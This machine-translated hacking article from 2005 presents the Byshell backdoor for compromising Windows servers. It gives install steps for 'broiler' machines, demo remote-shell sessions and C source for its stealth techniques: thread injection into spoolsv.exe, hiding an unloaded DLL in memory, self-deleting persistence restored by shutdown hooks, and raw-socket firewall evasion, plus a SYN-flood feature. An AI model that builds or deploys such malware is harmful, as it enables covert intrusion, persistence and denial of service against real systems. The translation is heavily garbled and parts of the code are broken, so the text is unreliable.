Byshell Backdoor:no process without DLL no disk file-the vulnerability warning-the black bar safety net

ID MYHACK58:6220055481
Type myhack58
Reporter 佚名
Modified 2005-12-16T00:00:00


For readers: invasion enthusiasts, network administrators, black Controller fans Pre-knowledge: C basic syntax Liu stream: the back door is the hackers of the eternal topic in each big website such as the 1 6 3, Yahoo, Peking University, etc. have been black after that, more and more people began to focus on server security, and various Backdoor technology is also an unprecedented hot up! Today we will bring you a heavyweight back door of using, programming methods, so that the majority of novice friends to have a good back door play, so the programming technology enthusiasts to have a good back door programming techniques can learn from. Of course, the more new technologies waiting for you to discover.

Byshell Backdoor: no process without DLL free hard drive file without the startup items

Now the network popular Trojan horse Backdoor tools a lot, but can be called fine is not much, most novices also use Radmin for a class of software to replace the back door program. Unfortunately, they are not a real Backdoor, very easy to server administrators perceive, and therefore broiler chickens often fly off also is very normal.

A qualified back door at least should do not be a strange process exists in Task Manager, to the back door process from the one that looks like a system process name is just deceiving; not in the registry Run startup items or services the startup item in the left well known as the start key value or added service, of course, more can not be written directly to the Start menu startup items; not as a disregard of the administrator or a firewall is generally a blatant attempt to open a strange port; like Bits. dll so wait for a connection when the endless port, connection start port program, the port check when only 3 0% chance of escape. In addition the back door of the best can hide their generated files, or to avoid infected by some administrators often check the integrity of system files. The first three points did not do the backdoor program is not a“more advanced”in the backdoor, of course when in use there is no stability, confidentiality at all. According to my classification, the now common back door probably can be divided into three“levels”: the ★Application level. Such as WinShell, Radmin, glaciers, etc., they basically did not take other methods to hide himself, is just an ordinary can achieve the remote control of the application. ★System level. More or less using some of the Ring3 under the hidden whereabouts of the programming techniques, 用得少的比如Bits.dll And Portless, with much more such as Hxdef is.

Tip: Hxdef although there is a drive, but it is the system of Hooks is all Ring3, therefore we tend to referred to it as a system-level rather than kernel-level Backdoor.

★The kernel level, the back door of the main part of the work in Ring0, so has the very strong concealment and lethality. But the publication of the complete kernel-level Backdoor number, the compatibility is also not neighbor Italy. This topic in Phrack and Rootkits. com has many valuable discussions and results published. In my own writing system-level Backdoor Byshell v0. 6 4, try to do more than the requirements, however, due to personal ability is limited, function is not comprehensive enough and stable, I hope you can give me good advice or for me to upgrade the version. In this article I will discuss the open rear door design, implementation, and, of course, the actual application, for example, wish master not to throw bricks, everyone together to discuss.

Application examples This is a realization of the free process, no DLL, no hard disk files, no startup items of Backdoor program. The use of thread injection a DLL into the system process, the lifting of the DLL mapping and delete their own files and startup items, shutdown when recovery. A lot to learn from the farmers Cmdbind2 of thought, where the farmer predecessors selfless sharing of the spirit extend 1 2 0 points for thanks. I allow this software and its source code is freely spread, but the references should indicate the source. Contact the author and get permission before, not Will the software adapt or delete the selected post used for commercial purposes, can be used as a study and private use. Byshell 0.64 supported Commands list is as follows: cmd, shell endshell, the chpass, the byver, the sysinfo is, pslist, and pskill, the modlist, get, put, reboot, and dettach, the popmsg, the SYN, queryDOS, with endDOS, refresh, etc., specific usage please see the specification.

Tip: the instructions on the omission of the refresh command, its role is to remove the dead connection, and give you the opportunity to re-connect, also can you change the IP later, to clear the original connection, otherwise it can not be a normal connection.

Install the back door as long as the Ntboot. exe and Ntboot. dll uploaded to the broiler in the same directory and execute“ntboot.exe –install”, 安装完成后可手动删除Ntboot.exe和Ntboot.dll that 连接 的 时候 用 By064cli.exe the. Note Byshell v0. 6 4 does not support the machine on the machine test, v 0.63 be. Now I use v 0.63 a demo using the effect: 1. Connection: please input the server ip address will be connected input the password(the default one is 'by') by

cmddir c:

The C drive of the volume is not tags. Volume serial number is CCB2-D751

c: directory

2005-01-29 1 4:2 2 <DIR> Documents and Settings 2004-10-01 1 9:2 4 <DIR> Inetpub 2004-11-17 2 0:5 6 <DIR> Intel 2004-10-30 1 4:1 8 24,576 isapilog.dll 2004-11-11 0 0:5 5 24,576 magic_asp.dll 2005-02-07 2 1:4 7 <DIR> My Music 2004-12-21 0 0:0 5 1 2 4 Operate. ini 2005-01-18 2 2:3 8 <DIR> Program Files 2005-02-07 2 3:3 1 <DIR> ubackup 2005-02-02 1 7:5 4 <DIR> WINNT 3 files 49,276 bytes 7 directory 124,207,104 available bytes 2. Get and the end of the Shell:


Microsoft Windows 2 0 0 0 [Version 5.00.2195] (C) copyright 1985-2000 Microsoft Corp.

C:WINNTsystem32>cd.. cd..

C:WINNT>cd.. cd..

C:>dir dir The C drive of the volume is not tags. Volume serial number is CCB2-D751

C: directory

...... Omitted 3 files 49,276 bytes 7 directory 124,207,104 available bytes

C:>endshell shell terminated


ByShell server version 0.63 Released Dec 19,2004 Copyleft@ "by" co. ltd. 3. Process listed with the Kill. Here are the BUG, the arrangement is not neat.


process: pid filename num_thread parentpid 8 System 4 3 0 1 8 4 smss.exe 6 8 2 0 8 csrss.exe 1 1 1 8 4 2 3 2 winlogon.exe 1 9 1 8 4 2 6 0 services.exe 3 1 2 3 2 2 7 2 lsass.exe 1 7 2 3 2 4 5 6 svchost.exe 1 1 2 6 0 4 8 8 SPOOLSV.EXE 1 4 2 6 0 5 2 4 msdtc.exe 2 1 2 6 0 6 3 6 svchost.exe 1 8 2 6 0 6 5 6 llssrv.exe 9 2 6 0 6 8 8 sqlservr.exe 2 8 2 6 0 7 7 6 winmgmt.exe 3 2 6 0 8 1 2 dfssvc.exe 2 2 6 0 8 3 2 inetinfo.exe 2 9 2 6 0 8 5 6 mssearch.exe 6 2 6 0 1 2 2 4 svchost.exe 1 1 2 6 0 1 1 7 6 explorer.exe 1 9 1 1 7 2 1 3 5 6 igfxtray.exe 2 1 1 7 6 1 4 0 4 PFWMain.exe 4 1 1 7 6 1 4 1 2 SOUNDMAN.EXE 2 1 1 7 6 1 4 2 8 realsched.exe 4 1 1 7 6 1 4 3 6 internat.exe 1 1 1 7 6 1 4 4 4 sqlmangr.exe 3 1 1 7 6 1 2 8 0 BitComet.exe 9 1 1 7 6 3 2 8 notepad.exe 2 1 1 7 6 1 1 9 6 MDM.EXE 5 4 5 6 1 5 1 2 conime.exe 1 1 0 8 8 1 5 2 0 cmd.exe 1 4 8 8 1 5 0 4 by063cli.exe 1 1 1 7 6


OK,the job was done,cuz we have localsystem & SE_DEBUG_NAME:)


mods of the 1 5 2 0: module_id module_name module_path 1 ntdll.dll C:WINNTSystem32ntdll.dll 1 KERNEL32.dll C:WINNTsystem32KERNEL32.dll 1 USER32.dll C:WINNTsystem32USER32.dll 1 GDI32.DLL C:WINNTsystem32GDI32.DLL 1 ADVAPI32.dll C:WINNTsystem32ADVAPI32.dll 1 RPCRT4.DLL C:WINNTsystem32RPCRT4.DLL 1 MSVCRT.dll C:WINNTsystem32MSVCRT.dll 1 IMM32.DLL C:WINNTSystem32IMM32.DLL

Well, it describes the three most common functions. In fact, on many occasions, these three functions are the most basic functions, is also the most difficult to ensure the stability of the three problems difficult, but the back door of the most prominent features should be freeProcess, no DLL, no hard disk files, no startup items to achieve, in the actual use of the process I believe we will find that its advantages, below we from design and programming point of view these features is how to achieve.

Design&programming In this Part I do not include the full code because its too long, I will quote a key code to illustrate writing ideas. The first is how to hide itself the process? One commonly used method is remote thread injection. But its biggest problem is the injection code into the remote process's address space due to address space changes, depending on the original address space of all direct addressing instructions require relocation. This points to a compilation of old hand to hand is very easy to understand, high-level language programmers, this means that all explicit and non-explicit global variables such as the API address and string are the need for manual re-positioning. Compared to the virus program, we are very happy, because we, the syringe can be at the same time to the remote process the injection of a“global variable block”, then the block address is transmitted to the remote function, and then in the remote function use this block to replace the direct addressing of global variables, and thus exempt from the preparation of complete“self-relocatable”code. The latter is considered to be very cumbersome and almost impossible with a high-level language implementation. But even so, the preparation can be re-positioned code complexity is still relatively large, the write module more backdoors will be very tired. Farmers seniors Cmdbind2 to achieve a complete manual re-positioning of the injection of backdoors, we look at his source code can be found he is only in the realization of the most common Bind Shell on it takes a lot of code, like ByShell v0. 6 4 such a function complex back door, if so, implement the function, then, is certainly difficult to imagine. Replace the direct write relocatable code. a common method is the injection into the remote process function to load a DLL, in which case the system will do for you relocation work, the back door of the main functions implemented in the DLL. For example, before the Black anti -, single-Changhong introduced this method. This method also has a small drawbacks is the administrator in the audit is you, the injection process time will find a unknown DLL and thus lead to the back door exposed. Farmers seniors presents an idea, first load the DLL, then put this piece of memory are all copied to other place, uninstall the DLL, and then apply with the original load the DLL in the same address space, the other place to“register”the DLL code is copied back into this space. And then directly call the DLL, it solves all the relocation issues, but also not in the injection process the list of loaded modules in our DLL. Farmers seniors and did not realize his idea for a code, a given I use this method to achieve the main code. Compare the discussion when we discuss other system-level hidden Process method. Bingle using the alternative Svchost start DLL service method to load the backdoor ZXshell also use this method. This method's main problem is instability, you must rewrite the registry sensitive key value and in the Svchost. exe to load the module appears in the unknown module. Of course if you use and original of the same name of the Trojan DLL to replace the Original DLL you can avoid the above problem, but also will encounter a new problem, is how to bypass the Windows System File Protection and the administrator of routine system file integrity check. Hxdef Unified using Hook ring3 API is mainly Ntdll. dll NativeAPI method itself the various aspects of the hidden. This method for the General Ring3 check the effect is very good, and may be part to achieve the port multiplexing. Its main problems are the Ring3 under the Hook means, and the comparison of the“field day”is Hxdef to the system of all the processes in the injection Trojan data, the effect also is not very good, very easy to be Ring0 RootKit Detector found, such as ICESWORD to. Finally there is the programming cumbersome. 我 选用 了 注射 远程 进程 Spoolsv.exe spooling the print service method 并且 在 注射 到 远程 的 函数 中 加载 然后 卸载 了 一 个 木马 DLL--Ntboot.dll that 注射器 则 是 Ntboot.exe the. Please look at the code:

void injcode(){HANDLE prohandle;//injection target process handle DWORD pid=0;//target process PID int ret; //temporary variable

//Use the toolhelp32 function to get the injected object PID Sleep(1 0 0 0); HANDLE snapshot; snapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); struct tagPROCESSENTRY32 processsnap; processsnap. dwSize=sizeof(tagPROCESSENTRY32); char injexe[]="spoolsv.exe";//injection target process, everyone can be their own change for(Process32First(snapshot,&processsnap); Process32Next(snapshot,&processsnap);) } CloseHandle(snapshot);//get PID //Obtain the SE_DEBUG_NAME privilege HANDLE hToken; OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken); TOKEN_PRIVILEGES tp; tp. PrivilegeCount = 1; LookupPrivilegeValue(NULL, SE_DEBUG_NAME,&tp. Privileges[0]. Luid); tp. Privileges[0]. Attributes=SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(hToken,0,&tp, sizeof(tp),0,0); //Now injection prohandle=OpenProcess(PROCESS_ALL_ACCESS,1,pid); DWORD WINAPI injfunc(LPVOID);//Injfunc is the injection function, the need for manual re-positioning //The following made need to use the API address and written into going to be the injection of global variable blocks, Injapistr is a global structure, global variables block content HMODULE hModule; LPVOID paramaddr;//global variable block address hModule=LoadLibrary("kernel32.dll"); injapistr. myLoadLibrary=(struct HINSTANCE *(stdcall )(const char ))GetProcAddress(hModule,"LoadLibraryA"); injapistr. myGetProcAddress=(FARPROC (stdcall)(HMODULE,LPCTSTR))GetProcAddress(hModule,"GetProcAddress"); injapistr. myVirtualAlloc=(void (stdcall )(void ,unsigned long,unsigned long,unsigned long))GetProcAddress(hModule,"VirtualAlloc"); injapistr. myFreeLibrary=(int (stdcall *)(struct HINSTANCE ))GetProcAddress(hModule,"FreeLibrary"); injapistr. myIsBadReadPtr=(int (stdcall )(const void ,unsigned int))GetProcAddress(hModule,"IsBadReadPtr"); injapistr. myVirtualFree=(int (stdcall )(void ,unsigned long,unsigned long))GetProcAddress(hModule,"VirtualFree"); //In the target process in the allocation of“global variable block”, and write the API address paramaddr=VirtualAllocEx(prohandle,0,sizeof(injapistr),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); ret=WriteProcessMemory(prohandle,paramaddr,&injapistr,sizeof(injapistr),0); //Write Injfunc function void injfuncaddr=VirtualAllocEx(prohandle,0,2 0 0 0 0,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);

ret=WriteProcessMemory(prohandle,injfuncaddr,injfunc,2 0 0 0 0,0); //Activate the remote thread CreateRemoteThread(prohandle,0,0,(DWORD (WINAPI )(void ))injfuncaddr,paramaddr,0,0); CloseHandle(prohandle); return; } //Injection to the remote function, is responsible for the completion of the loading and unloading function of the complex Trojan horse DLL in the difficult task DWORD WINAPI injfunc(LPVOID paramaddr){ //paramaddr, the global variable block header address. All static global variables need to re-position directly addressed, while dynamic allocation, heap, Virtualalloc and stack variables do not need to, because they use indirect addressing. In fact, strings can also just write into the global variable block, but the string is not much, here the direct use of ASM. char ntboot[1 6]; char msgbox[1 6];//variable name wrong, should be the DLL of the back door of the main function name. Khan, hope not to mislead everyone. INJAPISTR * pinjapistr=(INJAPISTR )paramaddr; __asm{ mov ntboot,'n' mov ntboot+1,'t'mov ntboot+2,'b' mov ntboot+3,'o' mov ntboot+4,'o' mov ntboot+5,'t' mov ntboot+6,'.' mov ntboot+7,'d' mov ntboot+8,'l' mov ntboot+9,'l' mov ntboot+10,0 mov msgbox,'C' mov msgbox+1,'m' mov msgbox+2,'d' mov msgbox+3,'S' mov msgbox+4,'e' mov msgbox+5,'r' mov msgbox+6,'v' mov msgbox+7,'i' mov msgbox+8,'c' mov msgbox+9,'e' mov msgbox+10,0 } HMODULE hModule=pinjapistr->myLoadLibrary(ntboot);//加载 Ntboot.dll DWORD (WINAPI myCmdService)(LPVOID);//DLL back door of the main function name myCmdService=(DWORD (WINAPI *)(LPVOID))(pinjapistr->myGetProcAddress(hModule,msgbox)); //Dear reader, the following is the essence: unsigned int memsize=0; void * tempdll=pinjapistr->myVirtualAlloc(0,0x23000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); memcpy(tempdll,hModule,0x23000); //0x23000 is the DLL size, not much less. If you change the Ntboot. dll of size please note that adjusting this value pinjapistr->myFreeLibrary(hModule); hModule=(HMODULE)pinjapistr->myVirtualAlloc(hModule,0x23000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); memcpy(hModule,tempdll,0x23000); pinjapistr->myVirtualFree(tempdll,0x23000,MEM_DECOMMIT); //Ends, the DLL is not loaded, but also has a role to play, cool right?! myCmdService(0);//call the back door of the main function. return 0; } The next problem is the startup items and files. Ntboot. exe is the back door of the syringe, will own as the service starts, we must not let the Administrators find the service key value. What should I do? This is also the farmers ' predecessors proposed the idea: first delete all the backdoor files and services, set a shutdown notification and a one click shutdown hook, even if the shutdown time is written into the file and services. Similarly, a start up this service as long as start it will first put yourself deleted. This realization no file and no startup items. Administrator to use Registry comparison will not be found exception, also nowhere looking for our back door file. Look at the set a shutdown notification and a one click shutdown hook code:

DWORD WINAPI hookthread( LPVOID lpParam ){ MSG msg;int tmpret;char tmpstr[1 0 0]; LRESULT CALLBACK JournalRecordProc(int code,WPARAM wParam,LPARAM lParam); msghook=SetWindowsHookEx(WH_JOURNALRECORD,JournalRecordProc,GetModuleHandle(0),0); if(! msghook) tmpret=SetConsoleCtrlHandler(HandlerRoutine,1); if(! tmpret) while (GetMessage(&msg, NULL, 0, 0)){void resume(); if(msg. message==WM_QUERYENDSESSION) } UnhookWindowsHookEx(msghook); return 0; }

BOOL WINAPI HandlerRoutine(DWORD dwCtrlType){void resume(); switch(dwCtrlType) { case CTRL_SHUTDOWN_EVENT: resume();//resume function, as the name suggests is to restore the files startup items break; default: break; } return 0; }

LRESULT CALLBACK JournalRecordProc(int code,WPARAM wParam,LPARAM lParam){void resume(); if(code<0){return CallNextHookEx(msghook,code,wParam,lParam);} if(code==HC_ACTION){ EVENTMSG * pevent=(EVENTMSG *)lParam; if(pevent->message==WM_KEYDOWN && LOBYTE(pevent->paramL)==0xFF) } return CallNextHookEx(msghook,code,wParam,lParam); }

With Hxdef Hook file registry Native API compared to this approach the benefits are non-existent file, it will not have what Ring0 Rootkit Detector found to be the Hook API to hide files and registry keys. The downside is if the person directly pull the power shut down we“rest in peace”. Then we will comfort myself: this Backdoor has enough hidden that will not let the other suspect to the back door, so that the use of power-down shutdown of the BT tool. Of course if you use Hxdef, then believe me, now that the Rootkit Detector is widespread, Hxdef has become a punchbag, in the administrator to check when will the“rest”very quickly. The last is how to achieve endless mouth like with the Rootkits hide a port that is not called an unprovoked mouth. That kind of stuff is not only unable to pass through the firewall will also be in the Administrators scan their machines when exposed, which is Byshell v0. 6 4 weak items, Ring3 the back door would have been difficult to have what good way to the port multiplexing, the use Raw_socket listening TCP can only do Bits. dll as“waiting for connection, when unprovoked mouth”; their loading into the SPI based service provider or a layered service provider can intercept all Ring3 network communication, but will in the registry and system, leaving more than enough information which leads us to the back door of“rest”in. Hxdef Hook system of all the processes in the Recv/WSArecv method, although there can not be multiplexed Ring0 port, such as 1 3 and 9, 4 4 5 the drawbacks, but still now it seems better Ring3 port multiplexing approach. Until now, the Byshell approach is to use Socket_raw custom Protocol is Non-TCP, non-UDP Protocol for communication, you can travel through most of the software firewalls and the hardware firewall, but its drawbacks are not guaranteed to pass through all the firewall, and does not support Windows XP SP2, because the latter cancel out the Socket_raw support. My implementation is relatively simple, is to use a Protocol number of 2 2 4 The monitor connection and refresh, another Protocol number 2 2 5 transmission back-door data, is very simple: WSADATA WSAData; WSAStartup(MAKEWORD(2,2),&WSAData); SOCKET sock224=socket(AF_INET,SOCK_RAW,2 2 4); sockaddr_in srvaddr; memset(&srvaddr,0,sizeof(struct sockaddr_in)); srvaddr. sin_family= AF_INET; srvaddr. sin_addr. S_un. Server_address =INADDR_ANY; ret=bind(sock224,(struct sockaddr )&srvaddr,sizeof(struct sockaddr)); if(ret){goto label2;} dwThreadId=0;char buff224[1 2 8]; DWORD WINAPI threadfunc( LPVOID lpParam ); HANDLE thrdhndl; //Build 2 2 5 connection thread thrdhndl=CreateThread(0, 0, threadfunc, 0, 0, &dwThreadId); //Wait for the Refresh while(1){recvfrom(sock224,buff224,1 2 8,0,0,0); if(! strncmp(buff224+3 2+sizeof(IP_HEADER),"+_)(&^%$#@!~ byrefreshbreak",2 7) && ! strncmp(buff224+sizeof(IP_HEADER),pwd,strlen(pwd))){ TerminateThread(thrdhndl,0);goto label1;} } In 2 2 5 code I implemented a simple error control, the code is relatively long here not listed, interested friends please look at the source code. Due to this multiplexing method is not very reliable and stable, so I released Byshell v0. 6 3. it directly opened a TCP port 1 3 8, completely incompatible with the back door, but to everyone used for testing or can. If you find Byshell v0. 6 4 not very stable you can try v0. 6 3the. But a serious mistake is I in Byshell v0. 6 4 specification drain up a command“refresh”, it can clear in case of 2 2 5 connection to the dead, and give you the opportunity to re-connect. The last is Byshell achieve a lot of commands, such as View system information, execute commands, the back door connection in upload and download, there's even a SYN flood attack. The back door of the function Work()function, so to facilitate functional expansion and modular programming. For it port multiplexing unsatisfactory status quo, I will continue to upgrade. The future may be written in Hxdef as Ring3 multiplexing, it may be Ring0 filter drive or something like that, also hope the predecessors to continue to guide me. My code style is not good, like regardless of line and compact code, but still hope that we work together to develop this software. In this Backdoor of writing, 3 people gave me a lot of help, please allow me to occupy space to represent their gratitude. They are the valley of the XI(gxisone, and Huang Xin(glacier, of course there are farmers, this Backdoor should be their credit. If there is a problem or want to and I exchange, 请Mail到 Thank you to everyone for ByShell and my attention and support.